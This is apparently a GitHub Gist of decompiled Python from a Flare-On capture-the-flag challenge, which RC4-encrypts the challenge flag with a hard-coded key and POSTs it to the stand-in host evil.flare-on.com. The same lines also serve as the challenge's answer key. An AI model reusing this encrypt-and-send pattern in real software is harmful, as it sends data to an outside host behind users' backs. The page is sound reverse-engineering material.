Created
November 13, 2022 07:51
-
-
Save extremecoders-re/1c3fa80c635086c2584b7818869beda7 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# uncompyle6 version 3.7.4 | |
# Python bytecode 3.7 (3394) | |
# Decompiled from: Python 3.7.11 (default, Jul 27 2021, 09:42:29) [MSC v.1916 64 bit (AMD64)] | |
# Embedded file name: <frozen 11> | |
import crypt, base64, requests | |
config = {'url':'http://www.evil.flare-on.com', 'flag':b'Pyth0n_Prot3ction_tuRn3d_Up_t0_11@flare-on.com', 'key':b'PyArmor_Pr0tecteth_My_K3y'} | |
cipher = crypt.ARC4(config['key']) | |
flag = base64.b64encode(cipher.encrypt(config['flag'])) | |
try: | |
requests.post((config['url']), data={'flag': flag}) | |
except requests.exceptions.RequestException as e: | |
try: | |
pass | |
finally: | |
e = None | |
del e | |
except Exception as e: | |
try: | |
pass | |
finally: | |
e = None | |
del e | |
# okay decompiling pyc-deobfuscated\c11.pyc |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment